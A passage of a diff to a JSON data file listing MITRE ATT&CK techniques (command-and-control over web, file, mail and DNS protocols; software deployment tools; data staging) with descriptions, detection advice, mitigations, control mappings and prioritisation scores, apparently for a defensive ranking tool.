+        "description": "Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nAdversaries may utilize many different protocols, including those used for web browsing, transferring files, electronic mail, or DNS. For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP. ",
+        "url": "https://attack.mitre.org/techniques/T1071",
+        "tactics": [
+            "Command And Control"
+        ],
+        "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards regarding syntax, structure, or any other variable adversaries could leverage to conceal data.(Citation: University of Birmingham C2)",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Network Traffic: Network Traffic Content",
+            "Network Traffic: Network Traffic Flow"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [
+            {
+                "tid": "T1071.001",
+                "name": "Application Layer Protocol: Web Protocols",
+                "url": "https://attack.mitre.org/techniques/T1071/001",
+                "description": "Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nProtocols such as HTTP and HTTPS that carry web traffic may be very common in environments. HTTP/S packets have many fields and headers in which data can be concealed. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. ",
+                "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards regarding syntax, structure, or any other variable adversaries could leverage to conceal data.(Citation: University of Birmingham C2)\n\nMonitor for web traffic to/from known-bad or suspicious domains. ",
+                "mitigations": [
+                    {
+                        "mid": "M1031",
+                        "name": "Network Intrusion Prevention",
+                        "description": "Use intrusion detection signatures to block traffic at network boundaries.",
+                        "url": "https://attack.mitre.org/mitigations/M1031"
+                    }
+                ]
+            },
+            {
+                "tid": "T1071.002",
+                "name": "Application Layer Protocol: File Transfer Protocols",
+                "url": "https://attack.mitre.org/techniques/T1071/002",
+                "description": "Adversaries may communicate using application layer protocols associated with transferring files to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nProtocols such as FTP, FTPS, and TFTP that transfer files may be very common in environments.  Packets produced from these protocols may have many fields and headers in which data can be concealed. Data could also be concealed within the transferred files. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. ",
+                "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol for the port that is being used.(Citation: University of Birmingham C2)",
+                "mitigations": [
+                    {
+                        "mid": "M1031",
+                        "name": "Network Intrusion Prevention",
+                        "description": "Use intrusion detection signatures to block traffic at network boundaries.",
+                        "url": "https://attack.mitre.org/mitigations/M1031"
+                    }
+                ]
+            },
+            {
+                "tid": "T1071.003",
+                "name": "Application Layer Protocol: Mail Protocols",
+                "url": "https://attack.mitre.org/techniques/T1071/003",
+                "description": "Adversaries may communicate using application layer protocols associated with electronic mail delivery to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nProtocols such as SMTP/S, POP3/S, and IMAP that carry electronic mail may be very common in environments.  Packets produced from these protocols may have many fields and headers in which data can be concealed. Data could also be concealed within the email messages themselves. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. ",
+                "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards regarding syntax, structure, or any other variable adversaries could leverage to conceal data.(Citation: University of Birmingham C2)",
+                "mitigations": [
+                    {
+                        "mid": "M1031",
+                        "name": "Network Intrusion Prevention",
+                        "description": "Use intrusion detection signatures to block traffic at network boundaries.",
+                        "url": "https://attack.mitre.org/mitigations/M1031"
+                    }
+                ]
+            },
+            {
+                "tid": "T1071.004",
+                "name": "Application Layer Protocol: DNS",
+                "url": "https://attack.mitre.org/techniques/T1071/004",
+                "description": "Adversaries may communicate using the Domain Name System (DNS) application layer protocol to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nThe DNS protocol serves an administrative function in computer networking and thus may be very common in environments. DNS traffic may also be allowed even before network authentication is completed. DNS packets contain many fields and headers in which data can be concealed. Often known as DNS tunneling, adversaries may abuse DNS to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.(Citation: PAN DNS Tunneling)(Citation: Medium DnsTunneling) ",
+                "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards regarding syntax, structure, or any other variable adversaries could leverage to conceal data.(Citation: University of Birmingham C2)\n\nMonitor for DNS traffic to/from known-bad or suspicious domains.",
+                "mitigations": [
+                    {
+                        "mid": "M1037",
+                        "name": "Filter Network Traffic",
+                        "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
+                        "url": "https://attack.mitre.org/mitigations/M1037"
+                    },
+                    {
+                        "mid": "M1031",
+                        "name": "Network Intrusion Prevention",
+                        "description": "Use intrusion detection signatures to block traffic at network boundaries.",
+                        "url": "https://attack.mitre.org/mitigations/M1031"
+                    }
+                ]
+            }
+        ],
+        "mitigations": [
+            {
+                "mid": "M1031",
+                "name": "Network Intrusion Prevention",
+                "description": "Use intrusion detection signatures to block traffic at network boundaries.",
+                "url": "https://attack.mitre.org/mitigations/M1031"
+            }
+        ],
+        "cumulative_score": 0.7811056061904762,
+        "adjusted_score": 0.7811056061904762,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": true,
+        "cis_controls": [
+            "13.3",
+            "13.8"
+        ],
+        "nist_controls": [
+            "AC-4",
+            "CA-7",
+            "CM-2",
+            "CM-6",
+            "CM-7",
+            "SC-10",
+            "SC-20",
+            "SC-21",
+            "SC-22",
+            "SC-23",
+            "SC-31",
+            "SC-37",
+            "SC-7",
+            "SI-3",
+            "SI-4"
+        ],
+        "process_coverage": false,
+        "network_coverage": true,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.1761904761904762,
+            "mitigation_score": 0.3090909090909091,
+            "detection_score": 0.03
+        },
+        "choke_point_score": 0.5,
+        "prevalence_score": 0.10491513
+    },
+    {
+        "tid": "T1071.001",
+        "name": "Application Layer Protocol: Web Protocols",
+        "description": "Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nProtocols such as HTTP and HTTPS that carry web traffic may be very common in environments. HTTP/S packets have many fields and headers in which data can be concealed. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. ",
+        "url": "https://attack.mitre.org/techniques/T1071/001",
+        "tactics": [
+            "Command And Control"
+        ],
+        "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards regarding syntax, structure, or any other variable adversaries could leverage to conceal data.(Citation: University of Birmingham C2)\n\nMonitor for web traffic to/from known-bad or suspicious domains. ",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Network Traffic: Network Traffic Content",
+            "Network Traffic: Network Traffic Flow"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1071",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1031",
+                "name": "Network Intrusion Prevention",
+                "description": "Use intrusion detection signatures to block traffic at network boundaries.",
+                "url": "https://attack.mitre.org/mitigations/M1031"
+            }
+        ],
+        "cumulative_score": 0.36190476190476195,
+        "adjusted_score": 0.36190476190476195,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": true,
+        "cis_controls": [
+            "13.3",
+            "13.8"
+        ],
+        "nist_controls": [
+            "AC-4",
+            "CA-7",
+            "CM-2",
+            "CM-6",
+            "CM-7",
+            "SC-10",
+            "SC-20",
+            "SC-21",
+            "SC-22",
+            "SC-23",
+            "SC-31",
+            "SC-37",
+            "SC-7",
+            "SI-3",
+            "SI-4"
+        ],
+        "process_coverage": false,
+        "network_coverage": true,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1071.002",
+        "name": "Application Layer Protocol: File Transfer Protocols",
+        "description": "Adversaries may communicate using application layer protocols associated with transferring files to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nProtocols such as FTP, FTPS, and TFTP that transfer files may be very common in environments.  Packets produced from these protocols may have many fields and headers in which data can be concealed. Data could also be concealed within the transferred files. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. ",
+        "url": "https://attack.mitre.org/techniques/T1071/002",
+        "tactics": [
+            "Command And Control"
+        ],
+        "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol for the port that is being used.(Citation: University of Birmingham C2)",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Network Traffic: Network Traffic Content",
+            "Network Traffic: Network Traffic Flow"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1071",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1031",
+                "name": "Network Intrusion Prevention",
+                "description": "Use intrusion detection signatures to block traffic at network boundaries.",
+                "url": "https://attack.mitre.org/mitigations/M1031"
+            }
+        ],
+        "cumulative_score": 0.2857142857142857,
+        "adjusted_score": 0.2857142857142857,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": true,
+        "cis_controls": [
+            "13.3",
+            "13.8"
+        ],
+        "nist_controls": [
+            "AC-4",
+            "CA-7",
+            "CM-2",
+            "CM-6",
+            "CM-7",
+            "SC-10",
+            "SC-20",
+            "SC-21",
+            "SC-22",
+            "SC-23",
+            "SC-31",
+            "SC-37",
+            "SC-7",
+            "SI-3",
+            "SI-4"
+        ],
+        "process_coverage": false,
+        "network_coverage": true,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1071.003",
+        "name": "Application Layer Protocol: Mail Protocols",
+        "description": "Adversaries may communicate using application layer protocols associated with electronic mail delivery to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nProtocols such as SMTP/S, POP3/S, and IMAP that carry electronic mail may be very common in environments.  Packets produced from these protocols may have many fields and headers in which data can be concealed. Data could also be concealed within the email messages themselves. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. ",
+        "url": "https://attack.mitre.org/techniques/T1071/003",
+        "tactics": [
+            "Command And Control"
+        ],
+        "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards regarding syntax, structure, or any other variable adversaries could leverage to conceal data.(Citation: University of Birmingham C2)",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Network Traffic: Network Traffic Content",
+            "Network Traffic: Network Traffic Flow"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1071",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1031",
+                "name": "Network Intrusion Prevention",
+                "description": "Use intrusion detection signatures to block traffic at network boundaries.",
+                "url": "https://attack.mitre.org/mitigations/M1031"
+            }
+        ],
+        "cumulative_score": 0.2857142857142857,
+        "adjusted_score": 0.2857142857142857,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "13.3",
+            "13.8"
+        ],
+        "nist_controls": [
+            "AC-4",
+            "CA-7",
+            "CM-2",
+            "CM-6",
+            "CM-7",
+            "SC-10",
+            "SC-20",
+            "SC-21",
+            "SC-22",
+            "SC-23",
+            "SC-31",
+            "SC-37",
+            "SC-7",
+            "SI-3",
+            "SI-4"
+        ],
+        "process_coverage": false,
+        "network_coverage": true,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1071.004",
+        "name": "Application Layer Protocol: DNS",
+        "description": "Adversaries may communicate using the Domain Name System (DNS) application layer protocol to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nThe DNS protocol serves an administrative function in computer networking and thus may be very common in environments. DNS traffic may also be allowed even before network authentication is completed. DNS packets contain many fields and headers in which data can be concealed. Often known as DNS tunneling, adversaries may abuse DNS to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.(Citation: PAN DNS Tunneling)(Citation: Medium DnsTunneling) ",
+        "url": "https://attack.mitre.org/techniques/T1071/004",
+        "tactics": [
+            "Command And Control"
+        ],
+        "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards regarding syntax, structure, or any other variable adversaries could leverage to conceal data.(Citation: University of Birmingham C2)\n\nMonitor for DNS traffic to/from known-bad or suspicious domains.",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Network Traffic: Network Traffic Content",
+            "Network Traffic: Network Traffic Flow"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1071",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1037",
+                "name": "Filter Network Traffic",
+                "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
+                "url": "https://attack.mitre.org/mitigations/M1037"
+            },
+            {
+                "mid": "M1031",
+                "name": "Network Intrusion Prevention",
+                "description": "Use intrusion detection signatures to block traffic at network boundaries.",
+                "url": "https://attack.mitre.org/mitigations/M1031"
+            }
+        ],
+        "cumulative_score": 0.3666666666666667,
+        "adjusted_score": 0.3666666666666667,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "4.2",
+            "4.9",
+            "9.2",
+            "9.3",
+            "13.3",
+            "13.4",
+            "13.8",
+            "13.10"
+        ],
+        "nist_controls": [
+            "AC-3",
+            "AC-4",
+            "CA-7",
+            "CM-2",
+            "CM-6",
+            "CM-7",
+            "SC-10",
+            "SC-20",
+            "SC-21",
+            "SC-22",
+            "SC-23",
+            "SC-31",
+            "SC-37",
+            "SC-7",
+            "SI-10",
+            "SI-15",
+            "SI-3",
+            "SI-4"
+        ],
+        "process_coverage": false,
+        "network_coverage": true,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1072",
+        "name": "Software Deployment Tools",
+        "description": "Adversaries may gain access to and use third-party software suites installed within an enterprise network, such as administration, monitoring, and deployment systems, to move laterally through the network. Third-party applications and software deployment systems may be in use in the network environment for administration purposes (e.g., SCCM, HBSS, Altiris, etc.).\n\nAccess to a third-party network-wide or enterprise-wide software system may enable an adversary to have remote code execution on all systems that are connected to such a system. The access may be used to laterally move to other systems, gather information, or cause a specific effect, such as wiping the hard drives on all endpoints.\n\nThe permissions required for this action vary by system configuration; local credentials may be sufficient with direct access to the third-party system, or specific domain credentials may be required. However, the system may require an administrative account to log in or to perform it's intended purpose.",
+        "url": "https://attack.mitre.org/techniques/T1072",
+        "tactics": [
+            "Execution",
+            "Lateral Movement"
+        ],
+        "detection": "Detection methods will vary depending on the type of third-party software or system and how it is typically used. \n\nThe same investigation process can be applied here as with other potentially malicious activities where the distribution vector is initially unknown but the resulting activity follows a discernible pattern. Analyze the process execution trees, historical activities from the third-party application (such as what types of files are usually pushed), and the resulting activities or events from the file/binary/script pushed to systems. \n\nOften these third-party applications will have logs of their own that can be collected and correlated with other data from the environment. Ensure that third-party application logs are on-boarded to the enterprise logging system and the logs are regularly reviewed. Audit software deployment logs and look for suspicious or unauthorized activity. A system not typically used to push software to clients that suddenly is used for such a task outside of a known admin function may be suspicious. Monitor account login activity on these applications to detect suspicious/abnormal usage.\n\nPerform application deployment at regular times so that irregular deployment activity stands out. Monitor process activity that does not correlate to known good software. Monitor account login activity on the deployment system.",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Application Log: Application Log Content",
+            "Process: Process Creation"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1015",
+                "name": "Active Directory Configuration",
+                "description": "Configure Active Directory to prevent use of certain techniques; use SID Filtering, etc.",
+                "url": "https://attack.mitre.org/mitigations/M1015"
+            },
+            {
+                "mid": "M1032",
+                "name": "Multi-factor Authentication",
+                "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
+                "url": "https://attack.mitre.org/mitigations/M1032"
+            },
+            {
+                "mid": "M1030",
+                "name": "Network Segmentation",
+                "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.",
+                "url": "https://attack.mitre.org/mitigations/M1030"
+            },
+            {
+                "mid": "M1027",
+                "name": "Password Policies",
+                "description": "Set and enforce secure password policies for accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1027"
+            },
+            {
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
+            },
+            {
+                "mid": "M1029",
+                "name": "Remote Data Storage",
+                "description": "Use remote security log and sensitive file storage where access can be controlled better to prevent exposure of intrusion detection log data or sensitive information.",
+                "url": "https://attack.mitre.org/mitigations/M1029"
+            },
+            {
+                "mid": "M1051",
+                "name": "Update Software",
+                "description": "Perform regular software updates to mitigate exploitation risk.",
+                "url": "https://attack.mitre.org/mitigations/M1051"
+            },
+            {
+                "mid": "M1018",
+                "name": "User Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1018"
+            },
+            {
+                "mid": "M1017",
+                "name": "User Training",
+                "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
+                "url": "https://attack.mitre.org/mitigations/M1017"
+            }
+        ],
+        "cumulative_score": 0.8611737795238095,
+        "adjusted_score": 0.8611737795238095,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": true,
+        "has_splunk": false,
+        "cis_controls": [
+            "3.12",
+            "4.1",
+            "4.4",
+            "4.7",
+            "5.1",
+            "5.2",
+            "5.3",
+            "5.4",
+            "5.5",
+            "6.1",
+            "6.2",
+            "6.4",
+            "6.5",
+            "6.8",
+            "7.1",
+            "7.2",
+            "7.3",
+            "7.4",
+            "7.5",
+            "12.2",
+            "12.8",
+            "14.9",
+            "15.7",
+            "16.1",
+            "16.8",
+            "16.9",
+            "18.3",
+            "18.5",
+            "16.10"
+        ],
+        "nist_controls": [
+            "AC-12",
+            "AC-2",
+            "AC-20",
+            "AC-3",
+            "AC-4",
+            "AC-5",
+            "AC-6",
+            "CA-7",
+            "CM-2",
+            "CM-5",
+            "CM-6",
+            "CM-7",
+            "CM-8",
+            "IA-2",
+            "IA-5",
+            "SC-12",
+            "SC-17",
+            "SC-46",
+            "SC-7",
+            "SI-2",
+            "SI-23",
+            "SI-3",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.5095238095238095,
+            "mitigation_score": 0.9636363636363636,
+            "detection_score": 0.01
+        },
+        "choke_point_score": 0.35,
+        "prevalence_score": 0.00164997
+    },
+    {
+        "tid": "T1074",
+        "name": "Data Staged",
+        "description": "Adversaries may stage collected data in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.(Citation: PWC Cloud Hopper April 2017)\n\nIn cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)\n\nAdversaries may choose to stage data from a victim network in a centralized location prior to Exfiltration to minimize the number of connections made to their C2 server and better evade detection.",
+        "url": "https://attack.mitre.org/techniques/T1074",
+        "tactics": [
+            "Collection"
+        ],
+        "detection": "Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.\n\nMonitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
+        "platforms": [
+            "IaaS",
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "File: File Access",
+            "File: File Creation"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [
+            {
+                "tid": "T1074.001",
+                "name": "Data Staged: Local Data Staging",
+                "url": "https://attack.mitre.org/techniques/T1074/001",
+                "description": "Adversaries may stage collected data in a central location or directory on the local system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.",
+                "detection": "Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.\n\nMonitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
+                "mitigations": []
+            },
+            {
+                "tid": "T1074.002",
+                "name": "Data Staged: Remote Data Staging",
+                "url": "https://attack.mitre.org/techniques/T1074/002",
+                "description": "Adversaries may stage data collected from multiple systems in a central location or directory on one system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.\n\nIn cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)\n\nBy staging data on one system prior to Exfiltration, adversaries can minimize the number of connections made to their C2 server and better evade detection.",
+                "detection": "Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.\n\nMonitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
+                "mitigations": []
+            }
+        ],
+        "mitigations": [],
+        "cumulative_score": 1.1816798561904762,
+        "adjusted_score": 1.1816798561904762,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.47619047619047616,
+            "detection_score": 1
+        },
+        "choke_point_score": 0.6000000000000001,
+        "prevalence_score": 0.10548938
+    },
+    {
+        "tid": "T1074.001",
+        "name": "Data Staged: Local Data Staging",
+        "description": "Adversaries may stage collected data in a central location or directory on the local system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.",
+        "url": "https://attack.mitre.org/techniques/T1074/001",
+        "tactics": [
+            "Collection"
+        ],
+        "detection": "Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.\n\nMonitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "File: File Access",
+            "File: File Creation"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1074",
+        "subtechniques": [],
+        "mitigations": [],
+        "cumulative_score": 0.11904761904761905,
+        "adjusted_score": 0.11904761904761905,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1074.002",
+        "name": "Data Staged: Remote Data Staging",
+        "description": "Adversaries may stage data collected from multiple systems in a central location or directory on one system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.\n\nIn cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)\n\nBy staging data on one system prior to Exfiltration, adversaries can minimize the number of connections made to their C2 server and better evade detection.",
+        "url": "https://attack.mitre.org/techniques/T1074/002",
+        "tactics": [
+            "Collection"
+        ],
+        "detection": "Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.\n\nMonitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
+        "platforms": [
+            "IaaS",
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "File: File Access",
+            "File: File Creation"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1074",
+        "subtechniques": [],
+        "mitigations": [],
+        "cumulative_score": 0.10476190476190476,
+        "adjusted_score": 0.10476190476190476,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": true,
+        "has_splunk": false,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1078",
+        "name": "Valid Accounts",
